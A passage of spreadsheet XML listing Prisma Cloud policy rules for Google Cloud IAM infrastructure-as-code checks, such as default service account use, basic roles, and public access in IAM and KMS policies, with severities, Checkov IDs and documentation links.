      <c r="E1087" t="inlineStr"/>
      <c r="F1087" t="inlineStr"/>
      <c r="G1087" t="b">
        <v>1</v>
      </c>
      <c r="H10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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1087" t="inlineStr">
        <is>
          <t>IaC:IAM:google-folder</t>
        </is>
      </c>
      <c r="K1087" t="inlineStr">
        <is>
          <t>Default Service Account is used at folder level</t>
        </is>
      </c>
      <c r="L1087" t="inlineStr"/>
      <c r="M1087" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1087" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1087" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1087" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1087" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1087" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1087" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1087" t="b">
        <v>0</v>
      </c>
      <c r="U1087" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1087" t="inlineStr">
        <is>
          <t>IaC:IAM:google-folder-iam-member,google-folder-iam-binding</t>
        </is>
      </c>
      <c r="W1087" t="inlineStr">
        <is>
          <t>Ensure Default Service account is not used at a folder level</t>
        </is>
      </c>
      <c r="X1087" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-9</t>
        </is>
      </c>
      <c r="Y1087" t="inlineStr"/>
      <c r="Z1087" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_folder_iam_member","google_folder_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1087" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1087" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1087" t="inlineStr">
        <is>
          <t>CKV_GCP_48</t>
        </is>
      </c>
      <c r="AD1087" t="b">
        <v>1</v>
      </c>
      <c r="AE1087" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1087" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>f5f3d0db-2599-4b01-aced-b5f2a69525ec</t>
        </is>
      </c>
      <c r="AI1087" t="inlineStr"/>
      <c r="AJ1087" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1087" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" t="inlineStr"/>
      <c r="B1088" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1088" s="2" t="inlineStr"/>
      <c r="D1088" t="inlineStr"/>
      <c r="E1088" t="inlineStr"/>
      <c r="F1088" t="inlineStr"/>
      <c r="G1088" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1088" t="inlineStr">
        <is>
          <t>IaC:IAM:google-folder</t>
        </is>
      </c>
      <c r="K1088" t="inlineStr">
        <is>
          <t>Basic roles used at the folder level</t>
        </is>
      </c>
      <c r="L1088" t="inlineStr"/>
      <c r="M1088" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1088" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1088" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1088" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1088" t="inlineStr"/>
      <c r="R1088" t="inlineStr"/>
      <c r="S1088" t="inlineStr"/>
      <c r="T1088" t="b">
        <v>0</v>
      </c>
      <c r="U1088" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1088" t="inlineStr">
        <is>
          <t>IaC:IAM:google-folder-iam-member,google-folder-iam-binding</t>
        </is>
      </c>
      <c r="W1088" t="inlineStr">
        <is>
          <t>Ensure basic roles are not used at folder level.</t>
        </is>
      </c>
      <c r="X1088" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-google-cloud-116</t>
        </is>
      </c>
      <c r="Y1088" t="inlineStr"/>
      <c r="Z1088" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_folder_iam_member","google_folder_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1088" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1088" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1088" t="inlineStr">
        <is>
          <t>CKV_GCP_116</t>
        </is>
      </c>
      <c r="AD1088" t="b">
        <v>1</v>
      </c>
      <c r="AE1088" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1088" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>2aa38259-53cd-40e4-b072-f498ffe889f4</t>
        </is>
      </c>
      <c r="AI1088" t="inlineStr"/>
      <c r="AJ1088" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1088" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" t="inlineStr"/>
      <c r="B1089" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1089" s="2" t="inlineStr"/>
      <c r="D1089" t="inlineStr"/>
      <c r="E1089" t="inlineStr"/>
      <c r="F1089" t="inlineStr"/>
      <c r="G1089" t="b">
        <v>1</v>
      </c>
      <c r="H10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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1089" t="inlineStr">
        <is>
          <t>IaC:IAM:google-iam</t>
        </is>
      </c>
      <c r="K1089" t="inlineStr">
        <is>
          <t>IAM policy defines public access</t>
        </is>
      </c>
      <c r="L1089" t="inlineStr"/>
      <c r="M1089" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1089" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1089" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1089" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1089" t="inlineStr"/>
      <c r="R1089" t="inlineStr"/>
      <c r="S1089" t="inlineStr"/>
      <c r="T1089" t="b">
        <v>0</v>
      </c>
      <c r="U1089" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1089" t="inlineStr">
        <is>
          <t>IaC:IAM:google-iam-policy</t>
        </is>
      </c>
      <c r="W1089" t="inlineStr">
        <is>
          <t>Ensure IAM policy should not define public access</t>
        </is>
      </c>
      <c r="X1089" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-google-cloud-113</t>
        </is>
      </c>
      <c r="Y1089" t="inlineStr"/>
      <c r="Z1089" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1089" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1089" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1089" t="inlineStr">
        <is>
          <t>CKV_GCP_113</t>
        </is>
      </c>
      <c r="AD1089" t="b">
        <v>1</v>
      </c>
      <c r="AE1089" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1089" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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89" t="inlineStr">
        <is>
          <t>c60aad83-d7df-4a69-9718-a7b3160b36c2</t>
        </is>
      </c>
      <c r="AI1089" t="inlineStr"/>
      <c r="AJ1089" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1089" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" t="inlineStr"/>
      <c r="B1090" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1090" s="2" t="inlineStr"/>
      <c r="D1090" t="inlineStr"/>
      <c r="E1090" t="inlineStr"/>
      <c r="F1090" t="inlineStr"/>
      <c r="G1090" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1090" t="inlineStr">
        <is>
          <t>IaC:IAM:google-iam</t>
        </is>
      </c>
      <c r="K1090" t="inlineStr">
        <is>
          <t>IAM workload identity pool provider is not restricted</t>
        </is>
      </c>
      <c r="L1090" t="inlineStr"/>
      <c r="M1090" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1090" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1090" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1090" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1090" t="inlineStr"/>
      <c r="R1090" t="inlineStr"/>
      <c r="S1090" t="inlineStr"/>
      <c r="T1090" t="b">
        <v>0</v>
      </c>
      <c r="U1090" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1090" t="inlineStr">
        <is>
          <t>IaC:IAM:google-iam-workload-identity-pool-provider</t>
        </is>
      </c>
      <c r="W1090" t="inlineStr">
        <is>
          <t>Ensure IAM workload identity pool provider is restricted</t>
        </is>
      </c>
      <c r="X1090" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-google-cloud-118</t>
        </is>
      </c>
      <c r="Y1090" t="inlineStr"/>
      <c r="Z1090" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_iam_workload_identity_pool_provider"]}</t>
        </is>
      </c>
      <c r="AA1090" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1090" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1090" t="inlineStr">
        <is>
          <t>CKV_GCP_118</t>
        </is>
      </c>
      <c r="AD1090" t="b">
        <v>1</v>
      </c>
      <c r="AE1090" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1090" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>aa3b7953-cf32-4f2e-90b1-058348802f02</t>
        </is>
      </c>
      <c r="AI1090" t="inlineStr"/>
      <c r="AJ1090" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1090" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" t="inlineStr"/>
      <c r="B1091" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1091" s="2" t="inlineStr"/>
      <c r="D1091" t="inlineStr"/>
      <c r="E1091" t="inlineStr"/>
      <c r="F1091" t="inlineStr"/>
      <c r="G1091" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1091" t="inlineStr">
        <is>
          <t>IaC:IAM:google-kms</t>
        </is>
      </c>
      <c r="K1091" t="inlineStr">
        <is>
          <t>KMS policy allows public access</t>
        </is>
      </c>
      <c r="L1091" t="inlineStr"/>
      <c r="M1091" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1091" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1091" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1091" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1091" t="inlineStr"/>
      <c r="R1091" t="inlineStr"/>
      <c r="S1091" t="inlineStr"/>
      <c r="T1091" t="b">
        <v>0</v>
      </c>
      <c r="U1091" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1091" t="inlineStr">
        <is>
          <t>IaC:IAM:google-kms-crypto-key-iam-policy,google-kms-crypto-key-iam-binding,google-kms-crypto-key-iam-member</t>
        </is>
      </c>
      <c r="W1091" t="inlineStr">
        <is>
          <t>Esnure KMS policy should not allow public access</t>
        </is>
      </c>
      <c r="X1091" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-google-cloud-112</t>
        </is>
      </c>
      <c r="Y1091" t="inlineStr"/>
      <c r="Z1091" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_kms_crypto_key_iam_policy","google_kms_crypto_key_iam_binding","google_kms_crypto_key_iam_member"]}</t>
        </is>
      </c>
      <c r="AA1091" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1091" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1091" t="inlineStr">
        <is>
          <t>CKV_GCP_112</t>
        </is>
      </c>
      <c r="AD1091" t="b">
        <v>1</v>
      </c>
      <c r="AE1091" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1091" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>2e4f4a53-1bdf-4f15-a198-0e3b7d1992f7</t>
        </is>
      </c>
      <c r="AI1091" t="inlineStr"/>
      <c r="AJ1091" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1091" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" t="inlineStr"/>
      <c r="B1092" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1092" s="2" t="inlineStr"/>
      <c r="D1092" t="inlineStr"/>
      <c r="E1092" t="inlineStr"/>
      <c r="F1092" t="inlineStr"/>
      <c r="G1092" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1092" t="inlineStr">
        <is>
          <t>IaC:IAM:google-organization</t>
        </is>
      </c>
      <c r="K1092" t="inlineStr">
        <is>
          <t>Basic roles utilized at the organization level</t>
        </is>
      </c>
      <c r="L1092" t="inlineStr"/>
      <c r="M1092" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1092" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1092" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1092" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1092" t="inlineStr"/>
      <c r="R1092" t="inlineStr"/>
      <c r="S1092" t="inlineStr"/>
      <c r="T1092" t="b">
        <v>0</v>
      </c>
      <c r="U1092" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1092" t="inlineStr">
        <is>
          <t>IaC:IAM:google-organization-iam-member,google-organization-iam-binding</t>
        </is>
      </c>
      <c r="W1092" t="inlineStr">
        <is>
          <t>Ensure basic roles are not used at organization level.</t>
        </is>
      </c>
      <c r="X1092" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-google-cloud-115</t>
        </is>
      </c>
      <c r="Y1092" t="inlineStr"/>
      <c r="Z1092" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_organization_iam_member","google_organization_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1092" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1092" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1092" t="inlineStr">
        <is>
          <t>CKV_GCP_115</t>
        </is>
      </c>
      <c r="AD1092" t="b">
        <v>1</v>
      </c>
      <c r="AE1092" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1092" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>21cd1d03-ecc6-4f64-b046-07a8d36d099a</t>
        </is>
      </c>
      <c r="AI1092" t="inlineStr"/>
      <c r="AJ1092" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1092" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1093" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1093" s="2" t="inlineStr"/>
      <c r="D1093" t="inlineStr"/>
      <c r="E1093" t="inlineStr"/>
      <c r="F1093" t="inlineStr"/>
      <c r="G1093" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1093" t="inlineStr">
        <is>
          <t>IaC:IAM:google-organization</t>
        </is>
      </c>
      <c r="K1093" t="inlineStr">
        <is>
          <t>Roles impersonate or manage Service Accounts used at organizational level</t>
        </is>
      </c>
      <c r="L1093" t="inlineStr"/>
      <c r="M1093" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1093" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1093" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1093" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1093" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1093" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1093" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1093" t="b">
        <v>0</v>
      </c>
      <c r="U1093" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1093" t="inlineStr">
        <is>
          <t>IaC:IAM:google-organization-iam-member,google-organization-iam-binding</t>
        </is>
      </c>
      <c r="W1093" t="inlineStr">
        <is>
          <t>Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level</t>
        </is>
      </c>
      <c r="X1093" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6</t>
        </is>
      </c>
      <c r="Y1093" t="inlineStr"/>
      <c r="Z1093" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_organization_iam_member","google_organization_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1093" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1093" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1093" t="inlineStr">
        <is>
          <t>CKV_GCP_45</t>
        </is>
      </c>
      <c r="AD1093" t="b">
        <v>1</v>
      </c>
      <c r="AE1093" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1093" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>ba6652a8-c848-494f-8f8d-1e8b908b667d</t>
        </is>
      </c>
      <c r="AI1093" t="inlineStr"/>
      <c r="AJ1093" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1093" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1094" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1094" s="2" t="inlineStr"/>
      <c r="D1094" t="inlineStr"/>
      <c r="E1094" t="inlineStr"/>
      <c r="F1094" t="inlineStr"/>
      <c r="G1094" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1094" t="inlineStr">
        <is>
          <t>IaC:IAM:google-organization</t>
        </is>
      </c>
      <c r="K1094" t="inlineStr">
        <is>
          <t>Default Service Account is used at organization level</t>
        </is>
      </c>
      <c r="L1094" t="inlineStr"/>
      <c r="M1094" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1094" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1094" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1094" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1094" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1094" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1094" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1094" t="b">
        <v>0</v>
      </c>
      <c r="U1094" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1094" t="inlineStr">
        <is>
          <t>IaC:IAM:google-organization-iam-member,google-organization-iam-binding</t>
        </is>
      </c>
      <c r="W1094" t="inlineStr">
        <is>
          <t>Ensure default service account is not used at an organization level</t>
        </is>
      </c>
      <c r="X1094" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8</t>
        </is>
      </c>
      <c r="Y1094" t="inlineStr"/>
      <c r="Z1094" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_organization_iam_member","google_organization_iam_binding"]}</t>
        </is>
      </c>
      <c r="AA1094" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1094" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1094" t="inlineStr">
        <is>
          <t>CKV_GCP_47</t>
        </is>
      </c>
      <c r="AD1094" t="b">
        <v>1</v>
      </c>
      <c r="AE1094" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1094" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>399fd728-52cd-42a8-8ed1-3b23b38651d5</t>
        </is>
      </c>
      <c r="AI1094" t="inlineStr"/>
      <c r="AJ1094" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1094" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1095" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1095" s="2" t="inlineStr"/>
      <c r="D1095" t="inlineStr"/>
      <c r="E1095" t="inlineStr"/>
      <c r="F1095" t="inlineStr"/>
      <c r="G1095" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1095" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project</t>
        </is>
      </c>
      <c r="K1095" t="inlineStr">
        <is>
          <t>Default Service Account is used at project level</t>
        </is>
      </c>
      <c r="L1095" t="inlineStr"/>
      <c r="M1095" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1095" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1095" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1095" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1095" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1095" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1095" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1095" t="b">
        <v>0</v>
      </c>
      <c r="U1095" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1095" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project-iam-binding,google-project-iam-member</t>
        </is>
      </c>
      <c r="W1095" t="inlineStr">
        <is>
          <t>Ensure Default Service account is not used at a project level</t>
        </is>
      </c>
      <c r="X1095" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7</t>
        </is>
      </c>
      <c r="Y1095" t="inlineStr"/>
      <c r="Z1095" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_project_iam_binding","google_project_iam_member"]}</t>
        </is>
      </c>
      <c r="AA1095" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1095" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1095" t="inlineStr">
        <is>
          <t>CKV_GCP_46</t>
        </is>
      </c>
      <c r="AD1095" t="b">
        <v>1</v>
      </c>
      <c r="AE1095" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1095" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>6c154645-4580-48e4-a136-30612b5da14f</t>
        </is>
      </c>
      <c r="AI1095" t="inlineStr"/>
      <c r="AJ1095" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1095" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1096" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1096" s="2" t="inlineStr"/>
      <c r="D1096" t="inlineStr"/>
      <c r="E1096" t="inlineStr"/>
      <c r="F1096" t="inlineStr"/>
      <c r="G1096" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J1096" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project</t>
        </is>
      </c>
      <c r="K1096" t="inlineStr">
        <is>
          <t>GCP IAM user are assigned Service Account User or Service Account Token creator roles at project level</t>
        </is>
      </c>
      <c r="L1096" t="inlineStr"/>
      <c r="M1096" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1096" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1096" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1096" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1096" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1096" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1096" t="inlineStr"/>
      <c r="T1096" t="b">
        <v>0</v>
      </c>
      <c r="U1096" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1096" t="inlineStr">
        <is>
          <t>IaC:IAM:google-project-iam-binding,google-project-iam-member</t>
        </is>
      </c>
      <c r="W1096" t="inlineStr">
        <is>
          <t>Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level</t>
        </is>
      </c>
      <c r="X1096" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3</t>
        </is>
      </c>
      <c r="Y1096" t="inlineStr"/>
      <c r="Z1096" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["google_project_iam_binding","google_project_iam_member"]}</t>
        </is>
      </c>
      <c r="AA1096" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
